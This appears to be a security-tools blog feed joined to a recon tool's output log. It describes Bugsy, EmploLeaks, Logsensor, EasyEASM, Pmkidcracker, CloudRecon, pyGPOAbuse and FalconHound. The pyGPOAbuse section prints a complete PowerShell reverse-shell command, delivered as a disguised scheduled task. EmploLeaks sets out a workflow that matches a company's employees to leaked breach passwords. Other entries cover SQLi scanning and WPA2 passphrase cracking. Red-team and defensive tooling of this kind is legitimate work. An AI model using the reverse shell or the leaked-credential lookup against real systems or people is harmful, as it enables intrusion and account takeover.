─────▄█░░▀▀▀▀▀░░█▄
─▄▄──█░░░░░░░░░░░█──▄▄
█▄▄█─█░░▀░░┬░░▀░░█─█▄▄█
██╗░░░░░░░██╗███████╗██████╗░░█████╗░ █████╗░██████╗░██╗██╗░░░░░░█████╗░████████╗
░██║░░██╗░░██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║██║░░░░░██╔══██╗╚══██╔══╝
░╚██╗████╗██╔╝█ ███╗░░██████╦╝██║░░╚═╝██║░░██║██████╔╝██║██║░░░░░██║░░██║░░░██║░░░
░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║░░░░░██║░░██║░░ ██║░░░
░░╚██╔╝░╚██╔╝░███████╗██████╦╝╚█████╔╝╚█████╔╝██║░░░░░██║███████╗╚█████╔╝░░░██║░░░
░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝░░╚════╝░╚═╝░░░ ░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░
[●] @h4r5h1t.hrs | G!2m0


[❌] Warning: Use with caution. You are responsible for your own actions.
[❌] Developers assume no liability and are not responsible for any misuse or damage cause by this tool.


Target: bugcrowd.com
Output: /home/gizmo/targets/bugcrowd
Threads: 100
Server: False
Exclude: False
Mode: Running all Enumeration
Time: 30-08-2021 15:10:00

[!] Please wait while scanning...

[●] Subdoamin Scanning is in progress: Scanning subdomains of bugcrowd.com
[●] Subdoamin Scanned - [assetfinder✔] Subdomain Found: 34
[●] Subdoamin Scanned - [sublist3r✔] Subdomain Found: 29
[●] Subdoamin Scanned - [subfinder✔] Subdomain Found: 54
[●] Subdoamin Scanned - [amass✔] Subdomain Found: 43
[●] Subdoamin Scanned - [findomain✔] Subdomain Found: 27

[●] Active Subdoamin Scanning is in progress:
[!] Please be patient. This may take a while...
[●] Active Subdoamin Scanned - [gobuster✔] Subdomain Found: 11
[●] Active Subdoamin Scanned - [amass✔] Subdomain Found: 0

[●] Subdomain Scanning: Filtering out of scope subdomains
[●] Subdomain Scanning: Filtering Alive subdomains
[●] Subdomain Scanning: Getting titles of valid subdomains
[●] Visual inspection of Subdoamins is completed. Check: /subdomains/aquatone/

[●] Scanning Completed for Subdomains of bugcrowd.com Total: 43 | Alive: 30

[●] Endpoints Scanning Completed for Subdomains of bugcrowd.com Total: 11032
[●] Vulnerabilities Scanning is in progress: Getting all vulnerabilities of bugcrowd.com
[●] Vulnerabilities Scanned - [XSS✔] Found: 0
[●] Vulnerabilities Scanned - [SQLi✔] Found: 0
[●] Vulnerabilities Scanned - [LFI✔] Found: 0
[●] Vulnerabilities Scanned - [CRLF✔] Found: 0
[●] Vulnerabilities Scanned - [SSRF✔] Found: 0
[●] Vulnerabilities Scanned - [Sensitive Data✔] Found: 0
[●] Vulnerabilities Scanned - [Open redirect✔] Found: 0
[●] Vulnerabilities Scanned - [Subdomain Takeover✔] Found: 0
[●] Vulnerabilities Scanned - [Nuclie✔] Found: 0
[●] Vulnerabilities Scanning Completed for Subdomains of bugcrowd.com Check: /vulnerabilities/


▒█▀▀█ █▀▀ █▀▀ █░░█ █░░ ▀▀█▀▀
▒█▄▄▀ █▀▀ ▀▀█ █░░█ █░░ ░░█░░
▒█░▒█ ▀▀▀ ▀▀▀ ░▀▀▀ ▀▀▀ ░░▀░░

[+] Subdomains of bugcrowd.com
[+] Subdomains Found: 0
[+] Subdomains Alive: 0
[+] Endpoints: 11032
[+] XSS: 0
[+] SQLi: 0
[+] Open Redirect: 0
[+] SSRF: 0
[+] CRLF: 0
[+] LFI: 0
[+] Sensitive Data: 0
[+] Subdomain Takeover: 0
[+] Nuclei: 0

Acknowledgement

WebCopilot is inspired from Garud & Pinaak by ROX4R.

Thanks to the authors of the tools & wordlists used in this script.

@aboul3la @tomnomnom @lc @hahwul @projectdiscovery @maurosoria @shelld3v @devanshbatham @michenriksen @defparam @projectdiscovery @bp0lr @ameenmaali @sqlmapproject @dwisiswant0 @OWASP @OJ @Findomain @danielmiessler @1ndianl33t @ROX4R

Warning: Developers assume no liability and are not responsible for any misuse or damage cause by this tool. So, please se with caution because you are responsible for your own actions.


Bugsy - Command-line Interface Tool That Provides Automatic Security Vulnerability Remediation For Your Code

By: Zion3R
11 January 2024 at 11:30


Bugsy is a command-line interface (CLI) tool that provides automatic security vulnerability remediation for your code. It is the community edition version of Mobb, the first vendor-agnostic automated security vulnerability remediation tool. Bugsy is designed to help developers quickly identify and fix security vulnerabilities in their code.


What is Mobb?

Mobb is the first vendor-agnostic automatic security vulnerability remediation tool. It ingests SAST results from Checkmarx, CodeQL (GitHub Advanced Security), OpenText Fortify, and Snyk and produces code fixes for developers to review and commit to their code.

What does Bugsy do?

Bugsy has two modes - Scan (no SAST report needed) & Analyze (the user needs to provide a pre-generated SAST report from one of the supported SAST tools).

Scan

  • Uses Checkmarx or Snyk CLI tools to run a SAST scan on a given open-source GitHub/GitLab repo
  • Analyzes the vulnerability report to identify issues that can be remediated automatically
  • Produces the code fixes and redirects the user to the fix report page on the Mobb platform

Analyze

  • Analyzes the a Checkmarx/CodeQL/Fortify/Snyk vulnerability report to identify issues that can be remediated automatically
  • Produces the code fixes and redirects the user to the fix report page on the Mobb platform

Disclaimer

This is a community edition version that only analyzes public GitHub repositories. Analyzing private repositories is allowed for a limited amount of time. Bugsy does not detect any vulnerabilities in your code, it uses findings detected by the SAST tools mentioned above.

Usage

You can simply run Bugsy from the command line, using npx:

npx mobbdev


EmploLeaks - An OSINT Tool That Helps Detect Members Of A Company With Leaked Credentials

By: Zion3R
12 January 2024 at 11:30

 

This is a tool designed for Open Source Intelligence (OSINT) purposes, which helps to gather information about employees of a company.

How it Works

The tool starts by searching through LinkedIn to obtain a list of employees of the company. Then, it looks for their social network profiles to find their personal email addresses. Finally, it uses those email addresses to search through a custom COMB database to retrieve leaked passwords. You an easily add yours and connect to through the tool.


Installation

To use this tool, you'll need to have Python 3.10 installed on your machine. Clone this repository to your local machine and install the required dependencies using pip in the cli folder:

cd cli
pip install -r requirements.txt

OSX

We know that there is a problem when installing the tool due to the psycopg2 binary. If you run into this problem, you can solve it running:

cd cli
python3 -m pip install psycopg2-binary`

Basic Usage

To use the tool, simply run the following command:

python3 cli/emploleaks.py

If everything went well during the installation, you will be able to start using EmploLeaks:

___________              .__         .__                 __
\_ _____/ _____ ______ | | ____ | | ____ _____ | | __ ______
| __)_ / \____ \| | / _ \| | _/ __ \__ \ | |/ / / ___/
| \ Y Y \ |_> > |_( <_> ) |_\ ___/ / __ \| < \___ \
/_______ /__|_| / __/|____/\____/|____/\___ >____ /__|_ \/____ >
\/ \/|__| \/ \/ \/ \/

OSINT tool 🕵 to chain multiple apis
emploleaks>

Right now, the tool supports two functionalities:

  • Linkedin, for searching all employees from a company and get their personal emails.
    • A GitLab extension, which is capable of finding personal code repositories from the employees.
  • If defined and connected, when the tool is gathering employees profiles, a search to a COMB database will be made in order to retrieve leaked passwords.

Retrieving Linkedin Profiles

First, you must set the plugin to use, which in this case is linkedin. After, you should set your authentication tokens and the run the impersonate process:

emploleaks> use --plugin linkedin
emploleaks(linkedin)> setopt JSESSIONID
JSESSIONID:
[+] Updating value successfull
emploleaks(linkedin)> setopt li-at
li-at:
[+] Updating value successfull
emploleaks(linkedin)> show options
Module options:

Name Current Setting Required Description
---------- ----------------------------------- ---------- -----------------------------------
hide yes no hide the JSESSIONID field
JSESSIONID ************************** no active cookie session in browser #1
li-at AQEDAQ74B0YEUS-_AAABilIFFBsAAAGKdhG no active cookie session in browser #1
YG00AxGP34jz1bRrgAcxkXm9RPNeYIAXz3M
cycrQm5FB6lJ-Tezn8GGAsnl_GRpEANRdPI
lWTRJJGF9vbv5yZHKOeze_WCHoOpe4ylvET
kyCyfN58SNNH
emploleaks(linkedin)> run i mpersonate
[+] Using cookies from the browser
Setting for first time JSESSIONID
Setting for first time li_at

li_at and JSESSIONID are the authentication cookies of your LinkedIn session on the browser. You can use the Web Developer Tools to get it, just sign-in normally at LinkedIn and press right click and Inspect, those cookies will be in the Storage tab.

Now that the module is configured, you can run it and start gathering information from the company:

Get Linkedin accounts + Leaked Passwords

We created a custom workflow, where with the information retrieved by Linkedin, we try to match employees' personal emails to potential leaked passwords. In this case, you can connect to a database (in our case we have a custom indexed COMB database) using the connect command, as it is shown below:

emploleaks(linkedin)> connect --user myuser --passwd mypass123 --dbname mydbname --host 1.2.3.4
[+] Connecting to the Leak Database...
[*] version: PostgreSQL 12.15

Once it's connected, you can run the workflow. With all the users gathered, the tool will try to search in the database if a leaked credential is affecting someone:

As a conclusion, the tool will generate a console output with the following information:
  • A list of employees of the company (obtained from LinkedIn)
  • The social network profiles associated with each employee (obtained from email address)
  • A list of leaked passwords associated with each email address.

How to build the indexed COMB database

An imortant aspect of this project is the use of the indexed COMB database, to build your version you need to download the torrent first. Be careful, because the files and the indexed version downloaded requires, at least, 400 GB of disk space available.

Once the torrent has been completelly downloaded you will get a file folder as following:

├── count_total.sh
├── data
│ ├── 0
│ ├── 1
│ │ ├── 0
│ │ ├── 1
│ │ ├── 2
│ │ ├── 3
│ │ ├── 4
│ │ ├─â&€ 5
│ │ ├── 6
│ │ ├── 7
│ │ ├── 8
│ │ ├── 9
│ │ ├── a
│ │ ├── b
│ │ ├── c
│ │ ├── d
│ │ ├── e
│ │ ├── f
│ │ ├── g
│ │ ├── h
│ │ ├── i
│ │ ├── j
│ │ ├── k
│ │ ├── l
│ │ ├── m
│ │ ├⠀─ n
│ │ ├── o
│ │ ├── p
│ │ ├── q
│ │ ├── r
│ │ ├── s
│ │ ├── symbols
│ │ ├── t

At this point, you could import all those files with the command create_db:

The importer takes a lot of time for that reason we recommend to run it with patience.

Next Steps

We are integrating other public sites and applications that may offer about a leaked credential. We may not be able to see the plaintext password, but it will give an insight if the user has any compromised credential:

  • Integration with Have I Been Pwned?
  • Integration with Firefox Monitor
  • Integration with Leak Check
  • Integration with BreachAlarm

Also, we will be focusing on gathering even more information from public sources of every employee. Do you have any idea in mind? Don't hesitate to reach us:

Or you con DM at @pastacls or @gaaabifranco on Twitter.



Logsensor - A Powerful Sensor Tool To Discover Login Panels, And POST Form SQLi Scanning

By: Zion3R
13 January 2024 at 11:30


A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning

Features

  • login panel Scanning for multiple hosts
  • Proxy compatibility (http, https)
  • Login panel scanning are done in multiprocessing

so the script is super fast at scanning many urls

quick tutorial & screenshots are shown at the bottom
project contribution tips at the bottom

 

Installation

git clone https://github.com/Mr-Robert0/Logsensor.git
cd Logsensor && sudo chmod +x logsensor.py install.sh
pip install -r requirements.txt
./install.sh

Dependencies

 

Quick Tutorial

1. Multiple hosts scanning to detect login panels

  • You can increase the threads (default 30)
  • only run login detector module
python3 logsensor.py -f <subdomains-list> 
python3 logsensor.py -f <subdomains-list> -t 50
python3 logsensor.py -f <subdomains-list> --login

2. Targeted SQLi form scanning

  • can provide only specifc url of login panel with --sqli or -s flag for run only SQLi form scanning Module
  • turn on the proxy to see the requests
  • customize user input name of login panel with actual name (default "username")
python logsensor.py -u www.example.com/login --sqli 
python logsensor.py -u www.example.com/login -s --proxy http://127.0.0.1:8080
python logsensor.py -u www.example.com/login -s --inputname email

View help

Login panel Detector Module -s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls -n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email') -t , --threads Number of threads (default 30) -h, --help Show this help message and exit " dir="auto">
python logsensor.py --help

usage: logsensor.py [-h --help] [--file ] [--url ] [--proxy] [--login] [--sqli] [--threads]

optional arguments:
-u , --url Target URL (e.g. http://example.com/ )
-f , --file Select a target hosts list file (e.g. list.txt )
--proxy Proxy (e.g. http://127.0.0.1:8080)
-l, --login run only Login panel Detector Module
-s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls
-n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email')
-t , --threads Number of threads (default 30)
-h, --help Show this help message and exit

Screenshots


Development

TODO

  1. adding "POST form SQli (Time based) scanning" and check for delay
  2. Fuzzing on Url Paths So as not to miss any login panel


EasyEASM - Zero-dollar Attack Surface Management Tool

By: Zion3R
14 January 2024 at 11:30


Zero-dollar attack surface management tool

featured at Black Hat Arsenal 2023 and Recon Village @ DEF CON 2023.

Description

Easy EASM is just that... the easiest to set-up tool to give your organization visibility into its external facing assets.

The industry is dominated by $30k vendors selling "Attack Surface Management," but OG bug bounty hunters and red teamers know the truth. External ASM was born out of the bug bounty scene. Most of these $30k vendors use this open-source tooling on the backend.

With ten lines of setup or less, using open-source tools, and one button deployment, Easy EASM will give your organization a complete view of your online assets. Easy EASM scans you daily and alerts you via Slack or Discord on newly found assets! Easy EASM also spits out an Excel skeleton for a Risk Register or Asset Database! This isn't rocket science, but it's USEFUL. Don't get scammed. Grab Easy EASM and feel confident you know what's facing attackers on the internet.


Installation

go install github.com/g0ldencybersec/EasyEASM/easyeasm@latest

Example config file

The tool expects a configuration file named config.yml to be in the directory you are running from.

Here is example of this yaml file:

# EasyEASM configurations
runConfig:
domains: # List root domains here.
- example.com
- mydomain.com
slack: https://hooks.slack.com/services/DUMMYDATA/DUMMYDATA/RANDOM # Slack webhook url for Slack notifications.
discord: https://discord.com/api/webhooks/DUMMYURL/Dasdfsdf # Discord webhook for Discord notifications.
runType: fast # Set to either fast (passive enum) or complete (active enumeration).
activeWordList: subdomainWordlist.txt
activeThreads: 100

Usage

To run the tool, fill out the config file: config.yml. Then, run the easyeasm module:

./easyeasm

After the run is complete, you should see the output CSV (EasyEASM.csv) in the run directory. This CSV can be added to your asset database and risk register!

Warranty

The creator(s) of this tool provides no warranty or assurance regarding its performance, dependability, or suitability for any specific purpose.

The tool is furnished on an "as is" basis without any form of warranty, whether express or implied, encompassing, but not limited to, implied warranties of merchantability, fitness for a particular purpose, or non-infringement.

The user assumes full responsibility for employing this tool and does so at their own peril. The creator(s) holds no accountability for any loss, damage, or expenses sustained by the user or any third party due to the utilization of this tool, whether in a direct or indirect manner.

Moreover, the creator(s) explicitly renounces any liability or responsibility for the accuracy, substance, or availability of information acquired through the use of this tool, as well as for any harm inflicted by viruses, malware, or other malicious components that may infiltrate the user's system as a result of employing this tool.

By utilizing this tool, the user acknowledges that they have perused and understood this warranty declaration and agree to undertake all risks linked to its utilization.

License

This project is licensed under the MIT License - see the LICENSE.md for details.

Contact

For assistance, use the Issues tab. If we do not respond within 7 days, please reach out to us here.



Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

By: Zion3R
15 January 2024 at 11:30


This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.


Program Usage

python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9

How PMKID is Calculated

The two main formulas to obtain a PMKID are as follows:

  1. Pairwise Master Key (PMK) Calculation: passphrase + salt(ssid) => PBKDF2(HMAC-SHA1) of 4096 iterations
  2. PMKID Calculation: HMAC-SHA1[pmk + ("PMK Name" + bssid + clientmac)]

This is just for understanding, both are already implemented in find_pw_chunk and calculate_pmkid.

Obtaining the PMKID

Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.

*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.

To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.

Open the pcap in WireShark:

  • Filter with wlan_rsna_eapol.keydes.msgnr == 1 in WireShark to display only EAPOL message 1 packets.
  • In EAPOL 1 pkt, Expand IEEE 802.11 QoS Data Field to obtain AP MAC, Client MAC
  • In EAPOL 1 pkt, Expand 802.1 Authentication > WPA Key Data > Tag: Vendor Specific > PMKID is below

If access point is vulnerable, you should see the PMKID value like the below screenshot:

Demo Run

Disclaimer

This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.



CloudRecon - Finding assets from certificates

By: Zion3R
16 January 2024 at 11:30


CloudRecon

Finding assets from certificates! Scan the web! Tool presented @DEFCON 31


Install

** You must have CGO enabled, and may have to install gcc to run CloudRecon**

sudo apt install gcc
go install github.com/g0ldencybersec/CloudRecon@latest

Description

CloudRecon

CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.

Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all but many still need HTTPs.

CloudRecon is a suite of tools to scan IP addresses or CIDRs (ex: cloud providers IPs) and find these hidden gems for testers, by inspecting those SSL certificates.

The tool suite is three parts in GO:

Scrape - A LIVE running tool to inspect the ranges for a keywork in SSL certs CN and SN fields in real time.

Store - a tool to retrieve IPs certs and download all their Orgs, CNs, and SANs. So you can have your OWN cert.sh database.

Retr - a tool to parse and search through the downloaded certs for keywords.

Usage

MAIN

Usage: CloudRecon scrape|store|retr [options]

-h Show the program usage message

Subcommands:

cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout
cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file
cloudrecon retr - Query local DB file for results

SCRAPE

scrape [options] -i <IPs/CIDRs or File>
-a Add this flag if you want to see all output including failures
-c int
How many goroutines running concurrently (default 100)
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE" )
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)

STORE

store [options] -i <IPs/CIDRs or File>
-c int
How many goroutines running concurrently (default 100)
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)

RETR

retr [options]
-all
Return all the rows in the DB
-cn string
String to search for in common name column, returns like-results (default "NONE")
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-ip string
String to search for in IP column, returns like-results (default "NONE")
-num
Return the Number of rows (results) in the DB (By IP)
-org string
String to search for in Organization column, returns like-results (default "NONE")
-san string
String to search for in common name column, returns like-results (default "NONE")


pyGPOAbuse - Partial Python Implementation Of SharpGPOAbuse

By: Zion3R
17 January 2024 at 11:30


Python partial implementation of SharpGPOAbuse by@pkb1s

This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.

Default behavior adds a local administrator.


How to use

Basic usage

Add john user to local administrators group (Password: H4x00r123..)

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

Advanced usage

Reverse shell example

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
-powershell \
-command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
-taskname "Completely Legit Task" \
-description "Dis is legit, pliz no delete" \
-user

Credits



FalconHound - A Blue Team Multi-Tool. It Allows You To Utilize And Enhance The Power Of Blo odHound In A More Automated Fashion

By: Zion3R
18 January 2024 at 11:30


FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool.

One of the challenging aspects of BloodHound is that it is a snapshot in time. FalconHound includes functionality that can be used to keep a graph of your environment up-to-date. This allows you to see your environment as it is NOW. This is especially useful for environments that are constantly changing.

One of the hardest releationships to gather for BloodHound is the local group memberships and the session information. As blue teamers we have this information readily available in our logs. FalconHound can be used to gather this information and add it to the graph, allowing it to be used by BloodHound.

This is just an example of how FalconHound can be used. It can be used to gather any information that you have in your logs or security tools and add it to the BloodHound graph.

Additionally, the graph can be used to trigger alerts or generate enrichment lists. For example, if a user is added to a certain group, FalconHound can be used to query the graph database for the shortest path to a sensitive or high-privilege group. If there is a path, this can be logged to the SIEM or used to trigger an alert.


Other examples where FalconHound can be used:

  • Adding, removing or timing out sessions in the graph, based on logon and logoff events.
  • Marking users and computers as compromised in the graph when they have an incident in Sentinel or MDE.
  • Adding CVE information and whether there is a public exploit available to the graph.
  • All kinds of Azure activities.
  • Recalculating the shortest path to sensitive groups when a user is added to a group or has a new role.
  • Adding new users, groups and computers to the graph.
  • Generating enrichment lists for Sentinel and Splunk of, for example, Kerberoastable users or users with ownerships of certain entities.

The possibilities are endless here. Please add more ideas to the issue tracker or submit a PR.

A blog detailing more on why we developed it and some use case examples can be found here

Index:

Supported data sources and targets

FalconHound is designed to be used with BloodHound. It is not a replacement for BloodHound. It is designed to leverage the power of BloodHound and all other data platforms it supports in an automated fashion.

Currently, FalconHound supports the following data sources and or targets:

  • Azure Sentinel
  • Azure Sentinel Watchlists
  • Splunk
  • Microsoft Defender for Endpoint
  • Neo4j
  • MS Graph API (early stage)
  • CSV files

Additional data sources and targets are planned for the future.

At this moment, FalconHound only supports the Neo4j database for BloodHound. Support for the API of BH CE and BHE is under active development.


Installation

Since FalconHound is written in Go, there is no installation required. Just download the binary from the release section and run it. There are compiled binaries available for Windows, Linux and MacOS. You can find them in the releases section.

Before you can run it, you need to create a config file. You can find an example config file in the root folder. Instructions on how to creat all crededentials can be found here.

The recommened way to run FalconHound is to run it as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date.

Requirements

  • BloodHound, or at least the Neo4j database for now.
  • A SIEM or other log aggregation tool. Currently, Azure Sentinel and Splunk are supported.
  • Credentials for each endpoint you want to talk to, with the required permissions.

Configuration

FalconHound is configured using a YAML file. You can find an example config file in the root folder. Each section of the config file is explained below.


Usage

Default run

To run FalconHound, just run the binary and add the -go parameter to have it run all queries in the actions folder.

./falconhound -go

List all enabled actions

To list all enabled actions, use the -actionlist parameter. This will list all actions that are enabled in the config files in the actions folder. This should be used in combination with the -go parameter.

./falconhound -actionlist -go

Run with a select set of actions

To run a select set of actions, use the -ids parameter, followed by one or a list of comma-separated action IDs. This will run the actions that are specified in the parameter, which can be very handy when testing, troubleshooting or when you require specific, more frequent updates. This should be used in combination with the -go parameter.

./falconhound -ids action1,action2,action3 -go

Run with a different config file

By default, FalconHound will look for a config file in the current directory. You can also specify a config file using the -config flag. This can allow you to run multiple instances of FalconHound with different configurations, against different environments.

./falconhound -go -config /path/to/config.yml

Run with a different actions folder

By default, FalconHound will look for the actions folder in the current directory. You can also specify a different folder using the -actions-dir flag. This makes testing and troubleshooting easier, but also allows you to run multiple instances of FalconHound with different configurations, against different environments, or at different time intervals.

./falconhound -go -actions-dir /path/to/actions

Run with credentials from a keyvault

By default, FalconHound will use the credentials in the config.yml (or a custom loaded one). By setting the -keyvault flag FalconHound will get the keyvault from the config and retrieve all secrets from there. Should there be items missing in the keyvault it will fall back to the config file.

./falconhound -go -keyvault

Actions

Actions are the core of FalconHound. They are the queries that FalconHound will run. They are written in the native language of the source and target and are stored in the actions folder. Each action is a separate file and is stored in the directory of the source of the information, the query target. The filename is used as the name of the action.

Action folder structure

The action folder is divided into sub-directories per query source. All folders will be processed recursively and all YAML files will be executed in alphabetical order.

The Neo4j actions should be processed last, since their output relies on other data sources to have updated the graph database first, to get the most up-to-date results.

Action files

All files are YAML files. The YAML file contains the query, some metadata and the target(s) of the queried information.

There is a template file available in the root folder. You can use this to create your own actions. Have a look at the actions in the actions folder for more examples.

While most items will be fairly self explanatory,there are some important things to note about actions:

Enabled

As the name implies, this is used to enable or disable an action. If this is set to false, the action will not be run.

Enabled: true

Debug

This is used to enable or disable debug mode for an action. If this is set to true, the action will be run in debug mode. This will output the results of the query to the console. This is useful for testing and troubleshooting, but is not recommended to be used in production. It will slow down the processing of the action depending on the number of results.

Debug: false

Query

The Query field is the query that will be run against the source. This can be a KQL query, a SPL query or a Cypher query depending on your SourcePlatform. IMPORTANT: Try to keep the query as exact as possible and only return the fields that you need. This will make the processing of the results faster and more efficient.

Additionally, when running Cypher queries, make sure to RETURN a JSON object as the result, otherwise processing will fail. For example, this will return the Name, Count, Role and Owners of the Azure Subscriptions:

MATCH p = (n)-[r:AZOwns|AZUserAccessAdministrator]->(g:AZSubscription) 
RETURN {Name:g.name , Count:COUNT(g.name), Role:type(r), Owners:COLLECT(n.name)}

Targets

Each target has several options that can be configured. Depending on the target, some might require more configuration than others. All targets have the Name and Enabled fields. The Name field is used to identify the target. The Enabled field is used to enable or disable the target. If this is set to false, the target will be ignored.

CSV

  - Name: CSV
Enabled: true
Path: path/to/filename.csv

Neo4j

The Neo4j target will write the results of the query to a Neo4j database. This output is per line and therefore it requires some additional configuration. Since we can transfer all sorts of data in all directions, FalconHound needs to understand what to do with the data. This is done by using replacement variables in the first line of your Cypher queries. These are passed to Neo4j as parameters and can be used in the query. The ReplacementFields fields are configured below.

  - Name: Neo4j
Enabled: true
Query: |
MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound'
Parameters:
Computer: Computer
TargetUserSid: TargetUserSid
Timestamp: Timestamp

The Parameters section defines a set of parameters that will be replaced by the values from the query results. These can be referenced as Neo4j parameters using the $parameter_name syntax.

Sentinel

The Sentinel target will write the results of the query to a Sentinel table. The table will be created if it does not exist. The table will be created in the workspace that is specified in the config file. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

This is why also query output needs to be controlled, you might otherwise flood your target.

  - Name: Sentinel
Enabled: true

Sentinel Watchlists

The Sentinel Watchlists target will write the results of the query to a Sentinel watchlist. The watchlist will be created if it does not exist. The watchlist will be created in the workspace that is specified in the config file. All columns returned by the query will be added to the watchlist.

 - Name: Watchlist
Enabled: true
WatchlistName: FH_MDE_Exploitable_Machines
DisplayName: MDE Exploitable Machines
SearchKey: DeviceName
Overwrite: true

The WatchlistName field is the name of the watchlist. The DisplayName field is the display name of the watchlist.

The SearchKey field is the column that will be used as the search key.

The Overwrite field is used to determine if the watchlist should be overwritten or appended to. If this is set to false, the results of the query will be appended to the watchlist. If this is set to true, the watchlist will be deleted and recreated with the results of the query.

Splunk

Like Sentinel, Splunk will write the results of the query to a Splunk index. The index will need to be created and tied to a HEC endpoint. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

  - Name: Splunk
Enabled: true

Azure Data Explorer

Like Sentinel, Splunk will write the results of the query to a ADX table. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

  - Name: ADX
Enabled: true
Table: "name"

Extensions to the graph

Relationship: HadSession

Once a session has ended, it had to be removed from the graph, but this felt like a waste of information. So instead of removing the session,it will be added as a relationship between the computer and the user. The relationship will be called HadSession. The relationship will have the following properties:

{
"till": "2021-08-31T14:00:00Z",
"source": "falconhound",
"reason": "logoff",
}

This allows for additional path discoveries where we can investigate whether the user ever logged on to a certain system, even if the session has ended.

Properties

FalconHound will add the following properties to nodes in the graph:

Computer: - 'exploitable': true/false - 'exploits': list of CVEs - 'exposed': true/false - 'ports': list of ports accessible from the internet - 'alertids': list of alert ids

Credential management

The currently supported ways of providing FalconHound with credentials are:

  • Via the config.yml file on disk.
  • Keyvault secrets. This still requires a ServicePrincipal with secrets in the yaml.
  • Mixed mode.

Config.yml

The config file holds all details required by each platform. All items in the config file are case-sensitive. Best practise is to separate the apps on a per service level but you can use 1 AppID/AppSecret for all Azure based actions.

The required permissions for your AppID/AppSecret are listed here.

Keyvault

A more secure way of storing the credentials would be to use an Azure KeyVault. Be aware that there is a small cost aspect to using Keyvaults. Access to KeyVaults currently only supports authentication based on a AppID/AppSecret which needs to be configured in the config.yml file.

The recommended way to set this up is to use a ServicePrincipal that only has the Key Vault Secrets User role to this Keyvault. This role only allows access to the secrets, not even list them. Do NOT reuse the ServicePrincipal which has access to Sentinel and/or MDE, since this almost completely negates the use of a Keyvault.

The items to configure in the Keyvault are listed below. Please note Keyvault secrets are not case-sensitive.

SentinelAppSecret
SentinelAppID
SentinelTenantID
SentinelTargetTable
SentinelResourceGroup
SentinelSharedKey
SentinelSubscriptionID
SentinelWorkspaceID
SentinelWorkspaceName
MDETenantID
MDEAppID
MDEAppSecret
Neo4jUri
Neo4jUsername
Neo4jPassword
GraphTenantID
GraphAppID
GraphAppSecret
AdxTenantID
AdxAppID
AdxAppSecret
AdxClusterURL
AdxDatabase
SplunkUrl
SplunkApiToken
SplunkIndex
SplunkApiPort
SplunkHecToken
SplunkHecPort
BHUrl
BHTokenID
BHTokenKey
LogScaleUrl
LogScaleToken
LogScaleRepository

Once configured you can add the -keyvault parameter while starting FalconHound.

Mixed mode / fallback

When the -keyvault parameter is set on the command-line, this will be the primary source for all required secrets. Should FalconHound fail to retrieve items, it will fall back to the equivalent item in the config.yml. If both fail and there are actions enabled for that source or target, it will throw errors on attempts to authenticate.

Deployment

